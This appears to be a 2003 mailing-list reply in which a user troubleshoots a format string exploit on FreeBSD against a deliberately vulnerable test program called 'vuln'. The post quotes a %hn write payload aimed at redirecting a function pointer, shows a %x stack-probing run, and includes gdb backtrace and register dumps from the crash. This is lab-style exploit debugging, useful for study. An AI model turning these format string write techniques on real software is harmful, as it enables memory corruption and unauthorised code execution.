Re: Formatstrings on *BSD

From: Ingram <Vail(at)gmx.net>
Date: Fri Jun 20 2003 - 04:07:26 EDT

>>[%.-16457x%8$hn%.15261x%9$hn] (35)
>^---- first question is your input still at %8$x and %9$x on the bsd box?

yep, see here:

> uname
FreeBSD
> ./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
0 0xbfbffccc
1 0xbfbffcd3
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffad8) buffer =
[AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242] (71) after : ptrf() = 0x8048770 (0xbfbffad8)
Welcome in "helloWorld"

>>...
>>Segmentation fault (core dumped)
>>

>^---- second ... what does the bt look like in gdb...

here we go, the fmt seems to corrupt eax

> gdb -core vuln.core
GNU gdb 4.18

.
.
.

This GDB was configured as "i386-unknown-freebsd". Core was generated by `vuln'.
Program terminated with signal 11, Segmentation fault. #0 0x40517d31 in ?? ()
(gdb) bt

#0  0x40517d31 in ?? ()
#1  0x8048805 in ?? ()
#2  0x8048767 in ?? ()
#3  0x8048561 in ?? ()
(gdb) i reg
eax            0x40517d31       1079082289
ecx            0x8049a70        134519408
edx            0x280e9968       672045416
ebx            0x280e8424       672039972
esp            0xbfbffad4       0xbfbffad4
ebp            0xbfbffae0       0xbfbffae0
esi            0x1      1
edi            0x280e9960       672045408
eip            0x40517d31       0x40517d31
eflags         0x10216  66070
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) x/1x $eax
0x40517d31:     Cannot access memory at address 0x40517d31.

kind regards
Ingram

-- 
+++ GMX - Mail, Messaging & more  
http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Received on Sat Jun 21 14:24:03 2003